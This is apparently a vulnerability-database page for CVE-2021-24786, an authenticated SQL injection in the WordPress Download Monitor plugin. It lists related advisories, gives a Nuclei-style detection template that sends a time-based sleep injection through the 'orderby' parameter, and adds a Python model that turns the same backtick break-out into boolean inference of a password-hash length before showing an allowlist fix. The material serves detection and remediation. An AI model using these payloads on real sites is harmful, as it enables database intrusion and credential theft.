| Title | Published | Views | Family |
|---|---|---|---|
| Wordpress Download Monitor Plugin WordPress V 4.4.4 - SQL Injection (Authenticated) Exploit | 2 Feb 2022 00:00 | – | zdt |
| CVE-2021-24786 | 3 Jan 2022 16:44 | – | circl |
| WordPress plugin SQL injection vulnerability | 3 Jan 2022 00:00 | – | cnnvd |
| WordPress Download Monitor Plugin SQL Injection Vulnerability | 6 Jan 2022 00:00 | – | cnvd |
| CVE-2021-24786 | 3 Jan 2022 12:49 | – | cve |
| CVE-2021-24786 Download Monitor < 4.4.5 - Admin+ SQL Injection | 3 Jan 2022 12:49 | – | cvelist |
| Wordpress Plugin Download Monitor WordPress V 4.4.4 - SQL Injection (Authenticated) | 2 Feb 2022 00:00 | – | exploitdb |
| EUVD-2021-11698 | 7 Oct 2025 00:30 | – | euvd |
| CVE-2021-24786 | 3 Jan 2022 13:15 | – | nvd |
| WordPress Download Monitor Plugin < 4.4.5 SQLi Vulnerability | 18 Jan 2022 00:00 | – | openvas |
```yaml
id: CVE-2021-24786

info:
  name: Download Monitor < 4.4.5 - SQL Injection
  author: MrHarsh
  severity: high
  description: |
    The Download Monitor plugin for WordPress is vulnerable to SQL injection via the 'orderby' parameter in versions before 4.4.5 due to insufficient escaping of the user-supplied parameter and a lack of preparation of the existing SQL query. This makes it possible for authenticated attackers with administrator-level permissions to append additional SQL to already existing queries and use it to extract sensitive information from the database.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data theft, modification, or deletion.
  remediation: |
    Update to version 4.4.5 or later.
  reference:
    - https://wpscan.com/vulnerability/a6571f16-66d2-449e-af83-1c6ddd56edfa
    - https://plugins.trac.wordpress.org/changeset/2610899/download-monitor
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24786
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2021-24786
    cwe-id: CWE-89
    epss-score: 0.17484
    epss-percentile: 0.96764
    cpe: cpe:2.3:a:download_monitor_project:download_monitor:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: download_monitor_project
    product: download_monitor
    framework: wordpress
    publicwww-query: "/wp-content/plugins/download-monitor/"
  tags: cve,cve2021,wordpress,wp-plugin,sqli,download-monitor,authenticated

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        @timeout: 30s
        GET /wp-admin/edit.php?post_type=dlm_download&page=download-monitor-logs&orderby=download_date`+and+(select+sleep(8))+and+`user_id=user_id HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "dlm_product")'
          - 'status_code_2 == 200'
          - 'duration_2 >= 8'
        condition: and
# digest: 4a0a00473045022100a7c1bcc2e00a28f0a8d846ee2219ffa83b2ceac8384b52e804290445768441b9022005b03254822af37860bcd553370d17d2c4dd31810c8c818db003bd9768fe02a8:922c64590222798bb761d5b6d8e72950
```
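The template's payload shows the shape of the bug: the `orderby` value lands inside a backtick-quoted identifier, so a backtick in the value closes the identifier early and the rest of the value becomes attacker-controlled SQL, with a trailing fragment that reabsorbs the closing backtick the application appends. The following Python model is an added example, not Download Monitor's code and not the fix shipped in 4.4.5. The query shape, the `dlm_download_log` and `wp_users` tables, the `esc_sql_like()` helper and the `SORTABLE_COLUMNS` allowlist are assumptions chosen to mirror that structure. It goes a step beyond the page's time-based probe: SQLite has no `sleep()`, so the example uses row order as the oracle and turns the same break-out into a boolean inference against the in-memory sample data, then shows that an allowlisted builder gives the attacker nothing to observe.

```python
"""Model of the CVE-2021-24786 'orderby' injection and an allowlist fix.

Added example, not Download Monitor's code. Table/column names, the query
shape and the esc_sql_like() helper are assumptions chosen to mirror the
structure the public payload implies: the orderby value is dropped into a
backtick-quoted identifier, so a backtick in the value closes it early.
"""
import sqlite3
from typing import Callable, List

# Assumed allowlist of columns the log screen may legitimately sort by.
SORTABLE_COLUMNS = {"download_id", "user_id", "download_date"}


def esc_sql_like(value: str) -> str:
    """Quote-escaping in the spirit of WordPress esc_sql(): it protects string
    literals but leaves backticks alone, so it cannot protect an identifier."""
    return (value.replace("\\", "\\\\").replace("'", "\\'")
                 .replace('"', '\\"').replace("\x00", "\\0"))


def build_log_query_vulnerable(orderby: str, order: str = "DESC") -> str:
    """Assumed vulnerable shape: 'order' is validated, 'orderby' is only escaped."""
    direction = "ASC" if order.upper() == "ASC" else "DESC"
    return (f"SELECT user_id FROM dlm_download_log "
            f"ORDER BY `{esc_sql_like(orderby)}` {direction}")


def build_log_query_safe(orderby: str, order: str = "DESC") -> str:
    """Identifiers cannot be bound as parameters, so map the request value onto
    a fixed allowlist and fall back to a default column; the raw input never
    reaches the SQL string."""
    column = orderby if orderby in SORTABLE_COLUMNS else "download_date"
    direction = "ASC" if order.upper() == "ASC" else "DESC"
    return f"SELECT user_id FROM dlm_download_log ORDER BY `{column}` {direction}"


def oracle_payload(condition_sql: str) -> str:
    """Same break-out shape as the published sleep() probe: close the backtick,
    inject an attacker expression, and comment out the closing backtick the
    application appends. SQLite has no sleep(), so row order is the oracle:
    ascending user_id if condition_sql is true, descending if it is false."""
    return (f"user_id` * 0, (CASE WHEN ({condition_sql}) "
            f"THEN user_id ELSE -user_id END) -- ")


def make_sample_db() -> sqlite3.Connection:
    """Constructed in-memory stand-ins for wp_users and the plugin's log table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
        INSERT INTO wp_users VALUES (1, 'admin', '$P$BExampleHashOfThirtyFourCharsXX');
        CREATE TABLE dlm_download_log (ID INTEGER PRIMARY KEY, download_id INTEGER,
                                       user_id INTEGER, download_date TEXT);
        INSERT INTO dlm_download_log (download_id, user_id, download_date) VALUES
            (10, 1, '2022-01-01'), (11, 2, '2022-01-02'), (12, 3, '2022-01-03');
    """)
    return conn


def run_probe(conn: sqlite3.Connection,
              builder: Callable[[str], str], condition_sql: str) -> List[int]:
    """Send one boolean probe through a query builder and return the user_id
    order the database produced."""
    sql = builder(oracle_payload(condition_sql))
    return [row[0] for row in conn.execute(sql)]


# Quote-free probes (a quote would be mangled by esc_sql_like, as in MySQL).
HASH_LONGER_THAN_30 = "(SELECT length(user_pass) FROM wp_users WHERE ID = 1) > 30"
HASH_LONGER_THAN_40 = "(SELECT length(user_pass) FROM wp_users WHERE ID = 1) > 40"

if __name__ == "__main__":
    db = make_sample_db()
    # Vulnerable builder: the injected CASE runs and the row order leaks the
    # truth value of the subquery (the sample hash is 34 chars: true, then false).
    print(run_probe(db, build_log_query_vulnerable, HASH_LONGER_THAN_30))
    print(run_probe(db, build_log_query_vulnerable, HASH_LONGER_THAN_40))
    # Safe builder: the unknown column falls back to download_date DESC for
    # both probes, so the attacker has nothing to infer.
    print(run_probe(db, build_log_query_safe, HASH_LONGER_THAN_30))
    print(run_probe(db, build_log_query_safe, HASH_LONGER_THAN_40))
```

The allowlist is the only sound fix for this class of bug: `ORDER BY` takes an identifier, and neither `$wpdb->prepare()` nor `esc_sql()` can quote an identifier safely, which is why the escaping the description mentions was insufficient. Note also that the template's `PR:H` vector is real: the log screen requires an administrator, and on a stock WordPress site an administrator can already install arbitrary plugin code, so the practical impact is highest on hardened installs where file modification is disabled.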